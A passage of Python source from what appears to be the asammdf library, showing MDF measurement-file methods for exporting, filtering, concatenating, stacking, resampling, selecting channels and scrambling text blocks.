csv_bytearray2hex(df[name_]), index=df.index
)
df = df.drop(columns=list(dropped))
for name_, s in dropped.items():
df[name_] = s
names_row = [df.index.name, *df.columns]
writer.writerow(names_row)
if reduce_memory_usage:
vals = [df.index, *(df[name] for name in df)]
else:
vals = [
df.index.to_list(),
*(df[name].to_list() for name in df),
]
for i, row in enumerate(zip(*vals)):
writer.writerow(row)
if self._callback:
self._callback(i + 1, gp_count)
elif fmt == "mat":
filename = filename.with_suffix(".mat")
if not single_time_base:
mdict = {}
master_name_template = "DGM{}_{}"
channel_name_template = "DG{}_{}"
used_names = UniqueDB()
groups_nr = len(self.virtual_groups)
for i, (group_index, virtual_group) in enumerate(
self.virtual_groups.items()
):
if self._terminate:
return
channels = self.included_channels(group_index)[group_index]
if not channels:
continue
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in channels.items()
for ch_index in channel_indexes
]
if not channels:
continue
channels = self.select(
channels,
ignore_value2text_conversions=ignore_value2text_conversions,
raw=raw,
)
master = channels[0].copy()
master.samples = master.timestamps
channels.insert(0, master)
for j, sig in enumerate(channels):
if j == 0:
channel_name = master_name_template.format(i, "timestamps")
else:
if use_display_names:
channel_name = sig.display_name or sig.name
else:
channel_name = sig.name
channel_name = channel_name_template.format(i, channel_name)
channel_name = matlab_compatible(channel_name)
channel_name = used_names.get_unique_name(channel_name)
if sig.samples.dtype.names:
sig.samples.dtype.names = [
matlab_compatible(name)
for name in sig.samples.dtype.names
]
mdict[channel_name] = sig.samples
if self._callback:
self._callback(i + 1, groups_nr + 1)
else:
used_names = UniqueDB()
mdict = {}
count = len(df.columns)
for i, name in enumerate(df.columns):
channel_name = matlab_compatible(name)
channel_name = used_names.get_unique_name(channel_name)
mdict[channel_name] = df[name].values
if hasattr(mdict[channel_name].dtype, "categories"):
mdict[channel_name] = np.array(mdict[channel_name], dtype="S")
if self._callback:
self._callback(i + 1 + count, count * 2)
mdict["timestamps"] = df.index.values
if self._callback:
self._callback(80, 100)
if format == "7.3":
savemat(
str(filename),
mdict,
long_field_names=True,
format="7.3",
delete_unused_variables=False,
oned_as=oned_as,
structured_numpy_ndarray_as_struct=True,
)
else:
savemat(
str(filename),
mdict,
long_field_names=True,
oned_as=oned_as,
do_compression=bool(compression),
)
if self._callback:
self._callback(100, 100)
elif fmt == "parquet":
filename = filename.with_suffix(".parquet")
if compression:
write_parquet(filename, df, compression=compression)
else:
write_parquet(filename, df)
else:
message = (
'Unsopported export type "{}". '
'Please select "csv", "excel", "hdf5", "mat" or "pandas"'
)
message.format(fmt)
logger.warning(message)
def filter(self, channels, version=None):
"""return new *MDF* object that contains only the channels listed in
*channels* argument
Parameters
----------
channels : list
list of items to be filtered; each item can be :
* a channel name string
* (channel name, group index, channel index) list or tuple
* (channel name, group index) list or tuple
* (None, group index, channel index) list or tuple
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default *None* and in this
case the original file version is used
Returns
-------
mdf : MDF
new *MDF* file
Examples
--------
>>> from asammdf import MDF, Signal
>>> import numpy as np
>>> t = np.arange(5)
>>> s = np.ones(5)
>>> mdf = MDF()
>>> for i in range(4):
... sigs = [Signal(s*(i*10+j), t, name='SIG') for j in range(1,4)]
... mdf.append(sigs)
...
>>> filtered = mdf.filter(['SIG', ('SIG', 3, 1), ['SIG', 2], (None, 1, 2)])
>>> for gp_nr, ch_nr in filtered.channels_db['SIG']:
... print(filtered.get(group=gp_nr, index=ch_nr))
...
<Signal SIG:
samples=[ 1. 1. 1. 1. 1.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
<Signal SIG:
samples=[ 31. 31. 31. 31. 31.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
<Signal SIG:
samples=[ 21. 21. 21. 21. 21.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
<Signal SIG:
samples=[ 12. 12. 12. 12. 12.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
# group channels by group index
gps = self.included_channels(channels=channels)
mdf = MDF(
version=version,
**self._kwargs,
)
integer_interpolation_mode = self._integer_interpolation
float_interpolation_mode = self._float_interpolation
mdf.configure(from_other=self)
mdf.header.start_time = self.header.start_time
self.configure(copy_on_get=False)
if self.name:
origin = self.name.name
else:
origin = "New MDF"
groups_nr = len(gps)
if self._callback:
self._callback(0, groups_nr)
for i, (group_index, groups) in enumerate(gps.items()):
for idx, sigs in enumerate(
self._yield_selected_signals(
group_index, groups=groups, version=version
)
):
if not sigs:
break
if idx == 0:
if sigs:
cg = self.groups[group_index].channel_group
cg_nr = mdf.append(
sigs,
common_timebase=True,
)
MDF._transfer_channel_group_data(
mdf.groups[cg_nr].channel_group, cg
)
else:
break
else:
mdf.extend(cg_nr, sigs)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
self.configure(copy_on_get=True)
mdf._transfer_metadata(self, message=f"Filtered from {self.name}")
if self._callback:
mdf._callback = mdf._mdf._callback = self._callback
return mdf
def iter_get(
self,
name=None,
group=None,
index=None,
raster=None,
samples_only=False,
raw=False,
):
"""iterator over a channel
This is usefull in case of large files with a small number of channels.
If the *raster* keyword argument is not *None* the output is
interpolated accordingly
Parameters
----------
name : string
name of channel
group : int
0-based group index
index : int
0-based channel index
raster : float
time raster in seconds
samples_only : bool
if *True* return only the channel samples as numpy array; if
*False* return a *Signal* object
raw : bool
return channel samples without appling the conversion rule; default
`False`
"""
gp_nr, ch_nr = self._validate_channel_selection(name, group, index)
grp = self.groups[gp_nr]
data = self._load_data(grp)
for fragment in data:
yield self.get(
group=gp_nr,
index=ch_nr,
raster=raster,
samples_only=samples_only,
data=fragment,
raw=raw,
)
@staticmethod
def concatenate(
files,
version="4.10",
sync=True,
add_samples_origin=False,
direct_timestamp_continuation=False,
**kwargs,
):
"""concatenates several files. The files
must have the same internal structure (same number of groups, and same
channels in each group)
Parameters
----------
files : list | tuple
list of *MDF* file names or *MDF*, zipfile.ZipFile, bz2.BZ2File or gzip.GzipFile
instances
..versionchanged:: 6.2.0
added support for zipfile.ZipFile, bz2.BZ2File and gzip.GzipFile
version : str
merged file version
sync : bool
sync the files based on the start of measurement, default *True*
add_samples_origin : bool
option to create a new "__samples_origin" channel that will hold
the index of the measurement from where each timestamp originated
direct_timestamp_continuation (False) : bool
the time stamps from the next file will be added right after the last
time stamp from the previous file; default False
.. versionadded:: 6.0.0
kwargs :
use_display_names (False) : bool
Examples
--------
>>> conc = MDF.concatenate(
[
'path/to/file.mf4',
MDF(BytesIO(data)),
MDF(zipfile.ZipFile('data.zip')),
MDF(bz2.BZ2File('path/to/data.bz2', 'rb')),
MDF(gzip.GzipFile('path/to/data.gzip', 'rb')),
],
version='4.00',
sync=False,
)
Returns
-------
concatenate : MDF
new *MDF* object with concatenated channels
Raises
------
MdfException : if there are inconsistencies between the files
"""
if not files:
raise MdfException("No files given for merge")
callback = kwargs.get("callback", None)
if callback:
callback(0, 100)
mdf_nr = len(files)
input_types = [isinstance(mdf, MDF) for mdf in files]
use_display_names = kwargs.get("use_display_names", False)
versions = []
if sync:
timestamps = []
for file in files:
if isinstance(file, MDF):
timestamps.append(file.header.start_time)
versions.append(file.version)
else:
if is_file_like(file):
ts, version = get_measurement_timestamp_and_version(file, "io")
timestamps.append(ts)
versions.append(version)
else:
with open(file, "rb") as mdf:
ts, version = get_measurement_timestamp_and_version(mdf, file)
timestamps.append(ts)
versions.append(version)
try:
oldest = min(timestamps)
except TypeError:
timestamps = [
timestamp.astimezone(timezone.utc) for timestamp in timestamps
]
oldest = min(timestamps)
offsets = [(timestamp - oldest).total_seconds() for timestamp in timestamps]
offsets = [offset if offset > 0 else 0 for offset in offsets]
else:
file = files[0]
if isinstance(file, MDF):
oldest = file.header.start_time
versions.append(file.version)
else:
if is_file_like(file):
ts, version = get_measurement_timestamp_and_version(file, "io")
versions.append(version)
else:
with open(file, "rb") as mdf:
ts, version = get_measurement_timestamp_and_version(mdf, file)
versions.append(version)
oldest = ts
offsets = [0 for _ in files]
included_channel_names = []
cg_map = {}
if add_samples_origin:
origin_conversion = {}
for i, mdf in enumerate(files):
origin_conversion[f"val_{i}"] = i
if isinstance(mdf, MDF):
origin_conversion[f"text_{i}"] = str(mdf.name)
else:
origin_conversion[f"text_{i}"] = str(mdf)
origin_conversion = from_dict(origin_conversion)
for mdf_index, (offset, mdf) in enumerate(zip(offsets, files)):
if not isinstance(mdf, MDF):
mdf = MDF(
mdf,
use_display_names=use_display_names,
)
if mdf_index == 0:
version = validate_version_argument(version)
kwargs = dict(mdf._kwargs)
kwargs.pop("callback", None)
merged = MDF(
version=version,
callback=callback,
**kwargs,
)
integer_interpolation_mode = mdf._integer_interpolation
float_interpolation_mode = mdf._float_interpolation
merged.configure(from_other=mdf)
merged.header.start_time = oldest
mdf.configure(copy_on_get=False)
if mdf_index == 0:
last_timestamps = [None for gp in mdf.virtual_groups]
groups_nr = len(last_timestamps)
else:
if len(mdf.virtual_groups) != groups_nr:
raise MdfException(
f"internal structure of file <{mdf.name}> is different; different channel groups count"
)
for i, group_index in enumerate(mdf.virtual_groups):
included_channels = mdf.included_channels(group_index)[group_index]
if mdf_index == 0:
included_channel_names.append(
[
mdf.groups[gp_index].channels[ch_index].name
for gp_index, channels in included_channels.items()
for ch_index in channels
]
)
different_channel_order = False
else:
names = [
mdf.groups[gp_index].channels[ch_index].name
for gp_index, channels in included_channels.items()
for ch_index in channels
]
different_channel_order = False
if names != included_channel_names[i]:
if sorted(names) != sorted(included_channel_names[i]):
raise MdfException(
f"internal structure of file {mdf_index} is different; different channels"
)
else:
original_names = included_channel_names[i]
different_channel_order = True
remap = [original_names.index(name) for name in names]
if not included_channels:
continue
idx = 0
last_timestamp = last_timestamps[i]
first_timestamp = None
original_first_timestamp = None
for idx, signals in enumerate(
mdf._yield_selected_signals(group_index, groups=included_channels)
):
if not signals:
break
if mdf_index == 0 and idx == 0:
first_signal = signals[0]
if len(first_signal):
if offset > 0:
timestamps = first_signal.timestamps + offset
for sig in signals:
sig.timestamps = timestamps
last_timestamp = first_signal.timestamps[-1]
first_timestamp = first_signal.timestamps[0]
original_first_timestamp = first_timestamp
if add_samples_origin:
signals.append(
Signal(
samples=np.ones(len(first_signal), dtype="<u2")
* mdf_index,
timestamps=first_signal.timestamps,
conversion=origin_conversion,
name="__samples_origin",
)
)
cg = mdf.groups[group_index].channel_group
cg_nr = merged.append(
signals,
common_timebase=True,
)
MDF._transfer_channel_group_data(
merged.groups[cg_nr].channel_group, cg
)
cg_map[group_index] = cg_nr
else:
if different_channel_order:
new_signals = [None for _ in signals]
if idx == 0:
for new_index, sig in zip(remap, signals):
new_signals[new_index] = sig
else:
for new_index, sig in zip(remap, signals[1:]):
new_signals[new_index + 1] = sig
new_signals[0] = signals[0]
signals = new_signals
if idx == 0:
signals = [(signals[0].timestamps, None)] + [
(sig.samples, sig.invalidation_bits) for sig in signals
]
master = signals[0][0]
_copied = False
if len(master):
if original_first_timestamp is None:
original_first_timestamp = master[0]
if offset > 0:
master = master + offset
_copied = True
if last_timestamp is None:
last_timestamp = master[-1]
else:
if (
last_timestamp >= master[0]
or direct_timestamp_continuation
):
if len(master) >= 2:
delta = master[1] - master[0]
else:
delta = 0.001
if _copied:
master -= master[0]
else:
master = master - master[0]
_copied = True
master += last_timestamp + delta
last_timestamp = master[-1]
signals[0] = master, None
if add_samples_origin:
signals.append(
(
np.ones(len(master), dtype="<u2") * mdf_index,
None,
)
)
cg_nr = cg_map[group_index]
merged.extend(cg_nr, signals)
if first_timestamp is None:
first_timestamp = master[0]
last_timestamps[i] = last_timestamp
mdf.configure(copy_on_get=True)
if mdf_index == 0:
merged._transfer_metadata(mdf)
if not input_types[mdf_index]:
mdf.close()
if callback:
callback(i + 1 + mdf_index * groups_nr, groups_nr * mdf_nr)
if MDF._terminate:
return
try:
merged._process_bus_logging()
except:
pass
return merged
@staticmethod
def stack(files, version="4.10", sync=True, **kwargs):
"""stack several files and return the stacked *MDF* object
Parameters
----------
files : list | tuple
list of *MDF* file names or *MDF*, zipfile.ZipFile, bz2.BZ2File or gzip.GzipFile
instances
..versionchanged:: 6.2.0
added support for zipfile.ZipFile, bz2.BZ2File and gzip.GzipFile
version : str
merged file version
sync : bool
sync the files based on the start of measurement, default *True*
kwargs :
use_display_names (False) : bool
Examples
--------
>>> stacked = MDF.stack(
[
'path/to/file.mf4',
MDF(BytesIO(data)),
MDF(zipfile.ZipFile('data.zip')),
MDF(bz2.BZ2File('path/to/data.bz2', 'rb')),
MDF(gzip.GzipFile('path/to/data.gzip', 'rb')),
],
version='4.00',
sync=False,
)
Returns
-------
stacked : MDF
new *MDF* object with stacked channels
"""
if not files:
raise MdfException("No files given for stack")
version = validate_version_argument(version)
callback = kwargs.get("callback", None)
use_display_names = kwargs.get("use_display_names", False)
files_nr = len(files)
input_types = [isinstance(mdf, MDF) for mdf in files]
if callback:
callback(0, files_nr)
if sync:
timestamps = []
for file in files:
if isinstance(file, MDF):
timestamps.append(file.header.start_time)
else:
if is_file_like(file):
ts, version = get_measurement_timestamp_and_version(file, "io")
timestamps.append(ts)
else:
with open(file, "rb") as mdf:
ts, version = get_measurement_timestamp_and_version(mdf, file)
timestamps.append(ts)
try:
oldest = min(timestamps)
except TypeError:
timestamps = [
timestamp.astimezone(timezone.utc) for timestamp in timestamps
]
oldest = min(timestamps)
offsets = [(timestamp - oldest).total_seconds() for timestamp in timestamps]
else:
offsets = [0 for file in files]
for mdf_index, (offset, mdf) in enumerate(zip(offsets, files)):
if not isinstance(mdf, MDF):
mdf = MDF(mdf, use_display_names=use_display_names)
if mdf_index == 0:
version = validate_version_argument(version)
kwargs = dict(mdf._kwargs)
kwargs.pop("callback", None)
stacked = MDF(
version=version,
callback=callback, **kwargs,
)
integer_interpolation_mode = mdf._integer_interpolation
float_interpolation_mode = mdf._float_interpolation
stacked.configure(from_other=mdf)
if sync:
stacked.header.start_time = oldest
else:
stacked.header.start_time = mdf.header.start_time
mdf.configure(copy_on_get=False)
for i, group in enumerate(mdf.virtual_groups):
dg_cntr = None
included_channels = mdf.included_channels(group)[group]
if not included_channels:
continue
for idx, signals in enumerate(
mdf._yield_selected_signals(
group, groups=included_channels, version=version
)
):
if not signals:
break
if idx == 0:
if sync:
timestamps = signals[0].timestamps + offset
for sig in signals:
sig.timestamps = timestamps
cg = mdf.groups[group].channel_group
dg_cntr = stacked.append(
signals,
common_timebase=True,
)
MDF._transfer_channel_group_data(
stacked.groups[dg_cntr].channel_group, cg
)
else:
master = signals[0][0]
if sync:
master = master + offset
signals[0] = master, None
stacked.extend(dg_cntr, signals)
if dg_cntr is not None:
for index in range(dg_cntr, len(stacked.groups)):
stacked.groups[
index
].channel_group.comment = (
f'stacked from channel group {i} of "{mdf.name.parent}"'
)
if callback:
callback(mdf_index, files_nr)
mdf.configure(copy_on_get=True)
if mdf_index == 0:
stacked._transfer_metadata(mdf)
if not input_types[mdf_index]:
mdf.close()
if MDF._terminate:
return
try:
stacked._process_bus_logging()
except:
pass
return stacked
def iter_channels(self, skip_master=True, copy_master=True):
"""generator that yields a *Signal* for each non-master channel
Parameters
----------
skip_master : bool
do not yield master channels; default *True*
copy_master : bool
copy master for each yielded channel
"""
for index in self.virtual_groups:
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(index)[
index
].items()
for ch_index in channel_indexes
]
channels = self.select(channels, copy_master=copy_master)
yield from channels
def iter_groups(
self,
raster=None,
time_from_zero=True,
empty_channels="skip",
keep_arrays=False,
use_display_names=False,
time_as_date=False,
reduce_memory_usage=False,
raw=False,
ignore_value2text_conversions=False,
only_basenames=False,
):
"""generator that yields channel groups as pandas DataFrames. If there
are multiple occurrences for the same channel name inside a channel
group, then a counter will be used to make the names unique
(<original_name>_<counter>)
Parameters
----------
use_display_names : bool
use display name instead of standard channel name, if available.
.. versionadded:: 5.21.0
reduce_memory_usage : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can reprezent the values found
in integer columns; default *False*
.. versionadded:: 5.21.0
raw (False) : bool
the dataframe will contain the raw channel values
.. versionadded:: 5.21.0
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.21.0
keep_arrays (False) : bool
keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
.. versionadded:: 5.21.0
empty_channels ("skip") : str
behaviour for channels without samples; the options are *skip* or
*zeros*; default is *skip*
.. versionadded:: 5.21.0
only_basenames (False) : bool
use just the field names, without prefix, for structures and channel
arrays
.. versionadded:: 5.21.0
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name who's timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
see `resample` for examples of using this argument
.. versionadded:: 5.21.0
"""
for i in self.virtual_groups:
yield self.get_group(
i,
raster=None,
time_from_zero=time_from_zero,
empty_channels=empty_channels,
keep_arrays=keep_arrays,
use_display_names=use_display_names,
time_as_date=time_as_date,
reduce_memory_usage=reduce_memory_usage,
raw=raw,
ignore_value2text_conversions=ignore_value2text_conversions,
only_basenames=only_basenames,
)
def resample(self, raster, version=None, time_from_zero=False):
"""resample all channels using the given raster. See *configure* to select
the interpolation method for interger channels
Parameters
----------
raster : float | np.array | str
new raster that can be
* a float step value
* a channel name who's timestamps will be used as raster (starting with asammdf 5.5.0)
* an array (starting with asammdf 5.5.0)
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default *None* and
in this case the original file version is used
time_from_zero : bool
start time stamps from 0s in the cut measurement
Returns
-------
mdf : MDF
new *MDF* with resampled channels
Examples
--------
>>> from asammdf import MDF, Signal
>>> import numpy as np
>>> mdf = MDF()
>>> sig = Signal(name='S1', samples=[1,2,3,4], timestamps=[1,2,3,4])
>>> mdf.append(sig)
>>> sig = Signal(name='S2', samples=[1,2,3,4], timestamps=[1.1, 3.5, 3.7, 3.9])
>>> mdf.append(sig)
>>> resampled = mdf.resample(raster=0.1)
>>> resampled.select(['S1', 'S2'])
[<Signal S1:
samples=[1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3 3 3 3 3 3 3 3 3 4]
timestamps=[1. 1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 2. 2.1 2.2 2.3 2.4 2.5 2.6 2.7
2.8 2.9 3. 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9 4. ]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
, <Signal S2:
samples=[1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 3 3 4 4]
timestamps=[1. 1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 2. 2.1 2.2 2.3 2.4 2.5 2.6 2.7
2.8 2.9 3. 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9 4. ]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
]
>>> resampled = mdf.resample(raster='S2')
>>> resampled.select(['S1', 'S2'])
[<Signal S1:
samples=[1 3 3 3]
timestamps=[1.1 3.5 3.7 3.9]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
, <Signal S2:
samples=[1 2 3 4]
timestamps=[1.1 3.5 3.7 3.9]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
]
>>> resampled = mdf.resample(raster=[1.9, 2.0, 2.1])
>>> resampled.select(['S1', 'S2'])
[<Signal S1:
samples=[1 2 2]
timestamps=[1.9 2. 2.1]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
, <Signal S2:
samples=[1 1 1]
timestamps=[1.9 2. 2.1]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
]
>>> resampled = mdf.resample(raster='S2', time_from_zero=True)
>>> resampled.select(['S1', 'S2'])
[<Signal S1:
samples=[1 3 3 3]
timestamps=[0. 2.4 2.6 2.8]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
, <Signal S2:
samples=[1 2 3 4]
timestamps=[0. 2.4 2.6 2.8]
invalidation_bits=None
unit=""
conversion=None
source=Source(name='Python', path='Python', comment='', source_type=4, bus_type=0)
comment=""
mastermeta="('time', 1)"
raw=True
display_name=
attachment=()>
]
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
mdf = MDF(
version=version,
**self._kwargs,
)
integer_interpolation_mode = self._integer_interpolation
float_interpolation_mode = self._float_interpolation
mdf.configure(from_other=self)
mdf.header.start_time = self.header.start_time
groups_nr = len(self.virtual_groups)
if self._callback:
self._callback(0, groups_nr)
try:
raster = float(raster)
assert raster > 0
except (TypeError, ValueError):
if isinstance(raster, str):
raster = self.get(raster).timestamps
else:
raster = np.array(raster)
else:
raster = master_using_raster(self, raster)
if time_from_zero and len(raster):
delta = raster[0]
new_raster = raster - delta
t_epoch = self.header.start_time.timestamp() + delta
mdf.header.start_time = datetime.fromtimestamp(t_epoch)
else:
delta = 0
new_raster = None
mdf.header.start_time = self.header.start_time
for i, (group_index, virtual_group) in enumerate(self.virtual_groups.items()):
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in self.included_channels(group_index)[
group_index
].items()
for ch_index in channel_indexes
]
sigs = self.select(channels, raw=True)
sigs = [
sig.interp(
raster,
integer_interpolation_mode=integer_interpolation_mode,
float_interpolation_mode=float_interpolation_mode,
)
for sig in sigs
]
if new_raster is not None:
for sig in sigs:
if len(sig):
sig.timestamps = new_raster
cg = self.groups[group_index].channel_group
dg_cntr = mdf.append(
sigs,
common_timebase=True,
)
MDF._transfer_channel_group_data(mdf.groups[dg_cntr].channel_group, cg)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
if self._callback:
self._callback(groups_nr, groups_nr)
mdf._transfer_metadata(self, message=f"Resampled from {self.name}")
if self._callback:
mdf._callback = mdf._mdf._callback = self._callback
return mdf
def select(
self,
channels,
record_offset=0,
raw=False,
copy_master=True,
ignore_value2text_conversions=False,
record_count=None,
validate=False,
):
"""retrieve the channels listed in *channels* argument as *Signal*
objects
.. note:: the *dataframe* argument was removed in version 5.8.0
use the ``to_dataframe`` method instead
Parameters
----------
channels : list
list of items to be filtered; each item can be :
* a channel name string
* (channel name, group index, channel index) list or tuple
* (channel name, group index) list or tuple
* (None, group index, channel index) list or tuple
record_offset : int
record number offset; optimization to get the last part of signal samples
raw : bool
get raw channel samples; default *False*
copy_master : bool
option to get a new timestamps array for each selected Signal or to
use a shared array for channels of the same channel group; default *True*
ignore_value2text_conversions (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.8.0
validate (False) : bool
consider the invalidation bits
.. versionadded:: 5.16.0
Returns
-------
signals : list
list of *Signal* objects based on the input channel list
Examples
--------
>>> from asammdf import MDF, Signal
>>> import numpy as np
>>> t = np.arange(5)
>>> s = np.ones(5)
>>> mdf = MDF()
>>> for i in range(4):
... sigs = [Signal(s*(i*10+j), t, name='SIG') for j in range(1,4)]
... mdf.append(sigs)
...
>>> # select SIG group 0 default index 1 default, SIG group 3 index 1, SIG group 2 index 1 default and channel index 2 from group 1
...
>>> mdf.select(['SIG', ('SIG', 3, 1), ['SIG', 2], (None, 1, 2)])
[<Signal SIG:
samples=[ 1. 1. 1. 1. 1.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
, <Signal SIG:
samples=[ 31. 31. 31. 31. 31.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
, <Signal SIG:
samples=[ 21. 21. 21. 21. 21.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
, <Signal SIG:
samples=[ 12. 12. 12. 12. 12.]
timestamps=[0 1 2 3 4]
unit=""
info=None
comment="">
]
"""
virtual_groups = self.included_channels(
channels=channels, minimal=False, skip_master=False
)
output_signals = {}
for virtual_group, groups in virtual_groups.items():
cycles_nr = self._mdf.virtual_groups[virtual_group].cycles_nr
pairs = [
(gp_index, ch_index)
for gp_index, channel_indexes in groups.items()
for ch_index in channel_indexes
]
if record_count is None:
cycles = cycles_nr - record_offset
else:
if cycles_nr < record_count + record_offset:
cycles = cycles_nr - record_offset
else:
cycles = record_count
signals = []
current_pos = 0
for idx, sigs in enumerate(
self._yield_selected_signals(
virtual_group,
groups=groups,
record_offset=record_offset,
record_count=record_count,
)
):
if not sigs:
break
if idx == 0:
next_pos = current_pos + len(sigs[0])
master = np.empty(cycles, dtype=sigs[0].timestamps.dtype)
master[current_pos:next_pos] = sigs[0].timestamps
for sig in sigs:
shape = (cycles,) + sig.samples.shape[1:]
signal = np.empty(shape, dtype=sig.samples.dtype)
signal[current_pos:next_pos] = sig.samples
sig.samples = signal
signals.append(sig)
if sig.invalidation_bits is not None:
inval = np.empty(cycles, dtype=sig.invalidation_bits.dtype)
inval[current_pos:next_pos] = sig.invalidation_bits
sig.invalidation_bits = inval
else:
sig, _ = sigs[0]
next_pos = current_pos + len(sig)
master[current_pos:next_pos] = sig
for signal, (sig, inval) in zip(signals, sigs[1:]):
signal.samples[current_pos:next_pos] = sig
if signal.invalidation_bits is not None:
signal.invalidation_bits[current_pos:next_pos] = inval
current_pos = next_pos
for signal, pair in zip(signals, pairs):
signal.timestamps = master
output_signals[pair] = signal
indexes = []
for item in channels:
if not isinstance(item, (list, tuple)):
item = [item]
indexes.append(self._validate_channel_selection(*item))
signals = [output_signals[pair] for pair in indexes]
if copy_master:
for signal in signals:
signal.timestamps = signal.timestamps.copy()
if not raw:
if ignore_value2text_conversions:
for signal in signals:
conversion = signal.conversion
if conversion:
samples = conversion.convert(signal.samples)
if samples.dtype.kind not in "US":
signal.samples = samples
signal.raw = True
signal.conversion = None
else:
for signal in signals:
conversion = signal.conversion
if conversion:
signal.samples = conversion.convert(signal.samples)
signal.raw = False
signal.conversion = None
if signal.samples.dtype.kind == "S":
signal.encoding = (
"utf-8" if self.version >= "4.00" else "latin-1"
)
if validate:
signals = [sig.validate() for sig in signals]
return signals
@staticmethod
def scramble(name, skip_attachments=False, **kwargs):
"""scramble text blocks and keep original file structure
Parameters
----------
name : str | pathlib.Path
file name
skip_attachments : bool
skip scrambling of attachments data if True
.. versionadded:: 5.9.0
Returns
-------
name : str
scrambled file name
"""
name = Path(name)
mdf = MDF(name)
texts = {}
callback = kwargs.get("callback", None)
if callback:
callback(0, 100)
count = len(mdf.groups)
if mdf.version >= "4.00":
try:
ChannelConversion = ChannelConversionV4
stream = mdf._file
if mdf.header.comment_addr:
stream.seek(mdf.header.comment_addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[mdf.header.comment_addr] = randomized_string(size)
for fh in mdf.file_history:
addr = fh.comment_addr
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
for ev in mdf.events:
for addr in (ev.comment_addr, ev.name_addr):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
for at in mdf.attachments:
for addr in (at.comment_addr, at.file_name_addr):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
if not skip_attachments and at.embedded_data:
texts[at.address + v4c.AT_COMMON_SIZE] = randomized_string(
at.embedded_size
)
for idx, gp in enumerate(mdf.groups, 1):
addr = gp.data_group.comment_addr
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
cg = gp.channel_group
for addr in (cg.acq_name_addr, cg.comment_addr):
if cg.flags & v4c.FLAG_CG_BUS_EVENT:
continue
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
source = cg.acq_source_addr
if source:
source = SourceInformation(
address=source, stream=stream, mapped=False, tx_map={}
)
for addr in (
source.name_addr,
source.path_addr,
source.comment_addr,
):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
for ch in gp.channels:
for addr in (ch.name_addr, ch.unit_addr, ch.comment_addr):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
source = ch.source_addr
if source:
source = SourceInformation(
address=source, stream=stream, mapped=False, tx_map={}
)
for addr in (
source.name_addr,
source.path_addr,
source.comment_addr,
):
if addr and addr not in texts:
stream.seek(addr + 8)
size = UINT64_u(stream.read(8))[0] - 24
texts[addr] = randomized_string(size)
conv = ch.conversion_addr
